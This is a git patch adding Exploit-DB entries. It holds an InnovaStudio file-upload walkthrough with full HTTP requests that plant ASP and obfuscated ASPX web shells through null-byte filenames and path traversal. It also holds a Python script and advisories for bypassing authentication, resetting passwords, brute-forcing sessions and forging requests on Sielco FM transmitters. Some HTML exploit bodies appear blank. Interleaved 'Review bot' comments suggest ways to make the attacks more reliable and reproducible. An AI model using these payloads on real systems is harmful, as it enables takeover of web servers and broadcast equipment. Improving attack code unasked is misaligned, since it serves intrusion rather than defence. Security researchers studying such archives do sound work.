From 2f07358143ce98db0f5988a0a9a3379c20c13ab2 Mon Sep 17 00:00:00 2001 
From: Exploit-DB Date: Sat, 15 Apr 2023 00:16:19 +0000 Subject: [PATCH] DB: 2023-04-15 16 changes to exploits/shellcodes/ghdb InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS) Bludit 4.0.0-rc-2 - Account takeover Microsoft Windows 11 - 'cmd.exe' Denial of Service --- exploits/asp/webapps/51362.txt | 330 ++++++++++++++++++++++++++++ exploits/hardware/remote/51366.txt | 74 +++++++ exploits/hardware/webapps/51363.txt | 59 +++++ exploits/hardware/webapps/51364.txt | 80 +++++++ exploits/hardware/webapps/51365.txt | 75 +++++++ exploits/hardware/webapps/51367.py | 105 +++++++++ exploits/hardware/webapps/51368.txt | 88 ++++++++ exploits/hardware/webapps/51369.txt | 118 ++++++++++ exploits/hardware/webapps/51370.txt | 67 ++++++ exploits/hardware/webapps/51371.txt | 54 +++++ exploits/macos/local/51361.txt | 319 +++++++++++++++++++++++++++ exploits/php/webapps/51360.txt | 90 ++++++++ exploits/windows/dos/51348.txt | 38 ---- files_exploits.csv | 13 +- ghdb.xml | 91 ++++++++ 15 files changed, 1562 insertions(+), 39 deletions(-) create mode 100644 exploits/asp/webapps/51362.txt create mode 100644 exploits/hardware/remote/51366.txt create mode 100644 exploits/hardware/webapps/51363.txt create 
mode 100644 exploits/hardware/webapps/51364.txt
create mode 100644 exploits/hardware/webapps/51365.txt
create mode 100755 exploits/hardware/webapps/51367.py
create mode 100644 exploits/hardware/webapps/51368.txt
create mode 100644 exploits/hardware/webapps/51369.txt
create mode 100644 exploits/hardware/webapps/51370.txt
create mode 100644 exploits/hardware/webapps/51371.txt
create mode 100644 exploits/macos/local/51361.txt
create mode 100644 exploits/php/webapps/51360.txt
delete mode 100644 exploits/windows/dos/51348.txt
diff --git a/exploits/asp/webapps/51362.txt b/exploits/asp/webapps/51362.txt
new file mode 100644
index 000000000..586357f58
--- /dev/null
+++ b/exploits/asp/webapps/51362.txt
@@ -0,0 +1,330 @@ +# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal +# Date: 11/04/2023 +# Exploit Author: Zer0FauLT [admindeepsec@proton.me] +# Vendor Homepage: innovastudio.com +# Product: Asset Manager +# Version: <= Asset Manager ASP Version 5.4 +# Tested on: Windows 10 and Windows Server 2019 +# CVE : 0DAY + +################################################################################################## +# # +# ASP version, in i_upload_object_FSO.asp, line 234 # +# # +# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" # +# # +################################################################################################## +||==============================================================================|| +|| ((((1)))) || +|| || +|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... || +||==============================================================================|| +################################################################################################## +" " +" FILE PERMISSIONS : [ 0644 ] " +" " +" DIR PERMISSIONS : [ 0755 ] " +" " +" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " +" " +################################################################################################## + +================================================================================================== + +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com 
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpFilter" + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="shell.asp" +Content-Type: application/octet-stream + +<%eval request("#11")%> +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + +================================================================================================== +" ...[ RESPONCE ]... " +" " +" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. " +" " +================================================================================================== + + *** + +||================================================================================|| +|| ((((2)))) || +|| || +|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... 
|| +|| || +||================================================================================|| +################################################################################################## +" " +" FILE PERMISSIONS : [ 0644 ] " +" " +" DIR PERMISSIONS : [ 0755 ] " +" " +" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " +" " +################################################################################################## + +================================================================================================== + +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpFilter" + + 
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt" +Content-Type: application/octet-stream + +<%eval request("#11")%> +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + +================================================================================================== +" >>> filename="shell.asp%00asp.txt" <<< " +" " +" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode " +" " +" or " +" " +" CTRL+Shift+U " +" " +" SEND! " +" " +================================================================================================== +" ...[ RESPONCE ]... " +" " +" OK! " +" " +" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] " +" " +" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] " +" " +================================================================================================== + + *** + +||==============================================================================|| +|| ((((3)))) || +|| || +|| ...:::NO WRITE PERMISSION!:::... || +|| || +|| ...:::Directory Traversal:::... 
|| +|| || +||==============================================================================|| +################################################################################################## +" " +" FILE PERMISSIONS : [ 0600 ] " +" " +" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] " +" " +" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] " +" " +" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " +" " +" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] " +" " +" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] " +" " +" " +################################################################################################## +########################################################################################################################################################## +# # +# What is the App_Data Folder useful? # +# App_Data contains application data files including .mdf database files, XML files, and other data store files. # +# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. # +# The App_Data folder is not public like the other website directories under the Home Directory. # +# Because it's a private directory, the IIS server hides it for security reasons. # +# Now, we will test whether such a directory exists. # +# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. # +# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. # +# So the directory will be public and it will be able to respond to external queries and run a shell. 
# +# # +########################################################################################################################################################## +================================================================================================== + +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpFilter" + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt" +Content-Type: application/octet-stream + + + + + + + + + + + + + + + + + + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + 
+================================================================================================== +" ...[ RESPONCE ]... " +" " +" OK! " +" " +" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] " +" " +" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] " +" " +================================================================================================== +# Now we will upload your shell to the directory where we made ByPass. # +================================================================================================== +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; 
name="inpFilter" + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt" +Content-Type: application/octet-stream + +<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> +<%var PAY:String= +Request["\x61\x62\x63\x64"];eval +(PAY,"\x75\x6E\x73\x61"+ +"\x66\x65");%> +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + +====================================================================================================== +" ...[ RESPONCE ]... " +" " +" OK! " +" " +" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] " +" " +" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] " +" " +========================================================================================================================================== +" " +" So what can we do if no directory on the site has write permission? " +" If not, we will test for vulnerabilities in the paths of other applications running on the server. " +" Sometimes this can be a mail service related vulnerability, " +" Sometimes also it can be a "Service Permissions" vulnerability. " +" Sometimes also it can be a "Binary Permissions " vulnerability. " +" Sometimes also it can be a "Weak Service Permissions" vulnerability. " +" Sometimes also it can be a "Unquoted Service Path" vulnerability. " +" Our limits are as much as our imagination... " +" *** 0DAY *** " +" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. " +" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. 
" +" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] " +" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] " +" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, " +" And then upload our shell file to the server by bypassing it. " +" This way, we will have full control over both the server and the mail service. " +" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] " +" " +========================================================================================================================================== \ No newline at end of file diff --git a/exploits/hardware/remote/51366.txt b/exploits/hardware/remote/51366.txt new file mode 100644 index 000000000..f93b255b0 --- /dev/null +++ b/exploits/hardware/remote/51366.txt @@ -0,0 +1,74 @@ + + + + + +
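Review bot: The Web.Config body in the third request (`filename="Web.Config%00net.txt"`) is blank in this listing, so the directive that makes App_Data servable cannot be reproduced from the page; presumably the XML was stripped on import, and a one-line comment naming the IIS setting that was changed (the hunk only records the effect, `404` becoming `403`) would make the step verifiable. The write-up also never names the two primitives it relies on: `inpCurrFolder2` is a client-supplied absolute destination path, which is the whole "directory traversal", and the `%00` in the filename gets past `oUpload.AllowedTypes` presumably because the extension test sees `.txt` while the file is written under the name truncated at the NUL (the result shown is `shell.asp`) — stating that as the root cause makes the fix obvious (server-fixed upload root, reject NUL bytes, check the extension of the name actually written). Minor: `Content-Length: 473` is repeated on all four requests despite different bodies, so the captures were hand-edited and will not replay verbatim.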
+ + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/51363.txt b/exploits/hardware/webapps/51363.txt new file mode 100644 index 000000000..554a61ece --- /dev/null +++ b/exploits/hardware/webapps/51363.txt @@ -0,0 +1,59 @@ +## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking +## Exploit Author: LiquidWorm + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: 2.12 (EXC5000GX) + 2.12 (EXC120GX) + 2.11 (EXC300GX) + 2.10 (EXC1600GX) + 2.10 (EXC2000GX) + 2.08 (EXC1600GX) + 2.08 (EXC1000GX) + 2.07 (EXC3000GX) + 2.06 (EXC5000GX) + 1.7.7 (EXC30GT) + 1.7.4 (EXC300GT) + 1.7.4 (EXC100GT) + 1.7.4 (EXC5000GT) + 1.6.3 (EXC1000GT) + 1.5.4 (EXC120GT) + +Summary: Sielco designs and produces FM radio transmitters +for professional broadcasting. The in-house laboratory develops +standard and customised solutions to meet all needs. Whether +digital or analogue, each product is studied to ensure reliability, +resistance over time and a high standard of safety. Sielco +transmitters are distributed throughout the world and serve +many radios in Europe, South America, Africa, Oceania and China. + +Desc: The Cookie session ID 'id' is of an insufficient length and +can be exploited by brute force, which may allow a remote attacker +to obtain a valid session, bypass authentication and manipulate +the transmitter. + +Tested on: lwIP/2.1.1 + Web/3.0.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5758 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php + + +26.01.2023 + +-- + + +# Session values (len=5) + +Cookie: id=44189 +Cookie: id=37692 +Cookie: id=+6638 +Cookie: id=+3077 +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/51364.txt b/exploits/hardware/webapps/51364.txt new file mode 100644 index 000000000..d5b38de08 --- /dev/null +++ b/exploits/hardware/webapps/51364.txt 
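Review bot: The brute-force claim is not quantified: `# Session values (len=5)` gives a length, but the sample values `+6638` and `+3077` carry an explicit sign, which suggests the id is a signed integer printed with a sign rather than a 5-character token, so the real keyspace is plausibly the 16-bit range (~65k values) — confirm and state it, e.g. `# id looks like a signed 16-bit integer (-32768..32767): ~65k requests enumerate every session`. Nothing is said about rate limiting or session lifetime on the device, and those decide whether the attack takes minutes or is impractical; the advisory should record what was observed. No request is shown, so a short loop sending `Cookie: id=N` against a `/protect/` page and checking for a non-login response would make the PoC reproducible.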
@@ -0,0 +1,80 @@ + + + +CSRF Add Admin: +--------------- + + + +
+ + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/51365.txt b/exploits/hardware/webapps/51365.txt new file mode 100644 index 000000000..23f956afd --- /dev/null +++ b/exploits/hardware/webapps/51365.txt @@ -0,0 +1,75 @@ + + + + + +
+ + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/51367.py b/exploits/hardware/webapps/51367.py new file mode 100755 index 000000000..bf65c3ee4 --- /dev/null +++ b/exploits/hardware/webapps/51367.py 
@@ -0,0 +1,105 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit +## Exploit Author: LiquidWorm +# +# +# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit +# +# +# Vendor: Sielco S.r.l +# Product web page: https://www.sielco.org +# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 +# PolyEco1000 CPU:1.9.4 FPGA:10.19 +# PolyEco1000 CPU:1.9.3 FPGA:10.19 +# PolyEco500 CPU:1.7.0 FPGA:10.16 +# PolyEco300 CPU:2.0.2 FPGA:10.19 +# PolyEco300 CPU:2.0.0 FPGA:10.19 +# +# Summary: PolyEco is the innovative family of high-end digital +# FM transmitters of Sielco. They are especially suited as high +# performance power system exciters or compact low-mid power +# transmitters. The same cabinet may in fact be fitted with 50, +# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +# 1000). +# +# All features can be controlled via the large touch-screen display +# 4.3" or remotely. Many advanced features are inside by default +# in the basic version such as: stereo and RDS encoder, audio +# change-over, remote-control via LAN and SNMP, "FFT" spectral +# analysis of the audio sources, SFN synchronization and much more. +# +# Desc: The application suffers from an authentication bypass and +# account takeover/lockout vulnerability that can be triggered by +# directly calling the users object and effectively modifying the +# password of the two constants user/role (user/admin). This can +# be exploited by an unauthenticated adversary by issuing a single +# POST request to the vulnerable endpoint and gain unauthorized +# access to the affected device with administrative privileges. 
+# +# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2023-5769 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php +# +# +# 26.01.2023 +# +# + + +import requests +print( ''' + .- _ _ -. + / / \\ \\ + ( ( (` (-o-) `) ) ) + \ \_ ` -+- ` _/ / + `- -+- -` + -+- + -+- + -+- + -+- + -+- + -+- + / \\ + ***************************************************** + ! Sielco PolyEco Authentication Bypass Script ! + ***************************************************** + + Please note that this script is for educational and + ethical purposes only. Using it for unauthorized + access or malicious activities is strictly prohibited + and can have serious legal and ethical consequences. + The responsibility of using this script in a lawful + and ethical manner lies solely with the user. The + author or creator of this script shall not be held + responsible for any unlawful or unethical activities + performed by the users. +''' ) +url = input( ' Enter the URL (e.g. http://host:8090): ' ) +if not 'http' in url : + url = 'http://{}'.format( url ) +user = input( ' Enter the desired role (e.g. user or admin): ') +if user not in [ 'user', 'admin' ] : + exit( ' Only \'user\' or \'admin\' please.' ) +password = input( ' Enter the desired password: ' ) +end = '/protect/users.htm' +payload = {} +if user == "user" : + payload[ 'pwd_admin' ] = '' + payload[ 'pwd_user' ] = password +elif user == 'admin' : + payload[ 'pwd_admin' ] = password + payload[ 'pwd_user' ] = '' +r = requests.post( url + end, data = payload ) +if r.status_code == 200 : + print( '\n MSG: OK.' ) +else: + print( '\n MSG: ERROR!' ) \ No newline at end of file 
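Review bot: `r = requests.post( url + end, data = payload )` has no timeout, so the script hangs indefinitely on a filtered port, and a `200` is taken as success even though nothing in the hunk shows the device returning anything else for a rejected POST, so `MSG: OK.` may be a false positive; use `r = requests.post(url.rstrip('/') + end, data=payload, timeout=10)` and confirm by logging in with the new password rather than trusting the status code. The scheme check `if not 'http' in url` is a substring test (a hostname containing `http` passes with no scheme added) — `if not url.startswith(('http://', 'https://'))` is what is meant. Also, the payload always sends the other role's field as an empty string (`pwd_admin = ''` when targeting `user`); if the endpoint applies both fields unconditionally this blanks the other account's password, which matches the "lockout" in the header description but should be stated in the prompt so an operator on an authorised test does not do it by accident.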
diff --git a/exploits/hardware/webapps/51368.txt b/exploits/hardware/webapps/51368.txt
new file mode 100644
index 000000000..cf6aad443
--- /dev/null
+++ b/exploits/hardware/webapps/51368.txt
@@ -0,0 +1,88 @@ +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset +## Exploit Author: LiquidWorm + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 + PolyEco1000 CPU:1.9.4 FPGA:10.19 + PolyEco1000 CPU:1.9.3 FPGA:10.19 + PolyEco500 CPU:1.7.0 FPGA:10.16 + PolyEco300 CPU:2.0.2 FPGA:10.19 + PolyEco300 CPU:2.0.0 FPGA:10.19 + +Summary: PolyEco is the innovative family of high-end digital +FM transmitters of Sielco. They are especially suited as high +performance power system exciters or compact low-mid power +transmitters. The same cabinet may in fact be fitted with 50, +100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +1000). + +All features can be controlled via the large touch-screen display +4.3" or remotely. Many advanced features are inside by default +in the basic version such as: stereo and RDS encoder, audio +change-over, remote-control via LAN and SNMP, "FFT" spectral +analysis of the audio sources, SFN synchronization and much more. + +Desc: Improper access control occurs when the application provides +direct access to objects based on user-supplied input. As a result +of this vulnerability attackers can bypass authorization and access +resources behind protected pages. 
+ +Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5768 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php + + +26.01.2023 + +-- + + +index.htm: +---------- +54: function dologin() { +55: var hash = hex_md5($('#password').val() + id); +56: $.get('/login.cgi', { +57: user: $('#user').val(), +58: password: hash, +59: id: id +60: }).done(function (data) { +61: var dati = $.parseXML(data); +62: id = $(dati).find('id').text(); +63: user = $(dati).find('u').text(); +64: if (id == 0) +65: window.location.href = '/index.htm'; +66: else { +67: scriviCookie('polyeco', id, 180); +68: if (user >= 3) +69: window.location.href = '/protect/factory.htm'; +70: else +71: window.location.href = '/protect/index.htm'; +72: } +73: }); +74: } + + +The function 'dologin()' in index.htm is called when a user submits a login form. +It starts by calculating a hash of the user-entered password and a variable 'id' +using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi' +endpoint with the user's entered username, the calculated password hash and the +'id' variable as parameters. If the request is successful, the function parses the +XML data returned from the server, extracting the values of the 'id' and 'u' elements. +Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects +the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the +value of 'id' and expires after 180 days. + +After that it checks the value of the 'user' variable, if it's greater than or equal +to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the +user to '/protect/index.htm'. 
An attacker can exploit this by modifying the client-side +JavaScript to always set the 'user' variable to a high value (4), or by tampering with +the data sent to the server during the login process to change the value of the 'user' +variable. It also works if the server's response variable 'user' is modified. \ No newline at end of file diff --git a/exploits/hardware/webapps/51369.txt b/exploits/hardware/webapps/51369.txt new file mode 100644 index 000000000..8e3e65c94 --- /dev/null +++ b/exploits/hardware/webapps/51369.txt 
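Review bot: The exploitability claim rests on the server not enforcing the role on `/protect/factory.htm`, but the hunk only shows client-side reasoning about `dologin()` (editing the JS so `user` is 4, or altering the server's `<u>` reply) and never shows a direct request to `/protect/factory.htm` with a user-level `polyeco` cookie succeeding; that request/response pair is the evidence a reader needs, since changing a client-side redirect proves nothing on its own. The description of `scriviCookie('polyeco', id, 180)` as "expires after 180 days" is an assumption — the function body is not shown, so hedge it or quote it. It would also help to say that `id` on line 55 is defined outside the quoted lines, so the reader knows where the MD5 salt comes from.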
@@ -0,0 +1,118 @@ +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation +## Exploit Author: LiquidWorm + + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 + PolyEco1000 CPU:1.9.4 FPGA:10.19 + PolyEco1000 CPU:1.9.3 FPGA:10.19 + PolyEco500 CPU:1.7.0 FPGA:10.16 + PolyEco300 CPU:2.0.2 FPGA:10.19 + PolyEco300 CPU:2.0.0 FPGA:10.19 + +Summary: PolyEco is the innovative family of high-end digital +FM transmitters of Sielco. They are especially suited as high +performance power system exciters or compact low-mid power +transmitters. The same cabinet may in fact be fitted with 50, +100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +1000). + +All features can be controlled via the large touch-screen display +4.3" or remotely. Many advanced features are inside by default +in the basic version such as: stereo and RDS encoder, audio +change-over, remote-control via LAN and SNMP, "FFT" spectral +analysis of the audio sources, SFN synchronization and much more. + +Desc: Improper access control occurs when the application provides +direct access to objects based on user-supplied input. As a result +of this vulnerability attackers can bypass authorization and access +resources behind protected pages. The application interface allows +users to perform certain actions via HTTP requests without performing +any validity checks to verify the requests. This can be exploited +to perform certain actions and manipulate the RDS text display. 
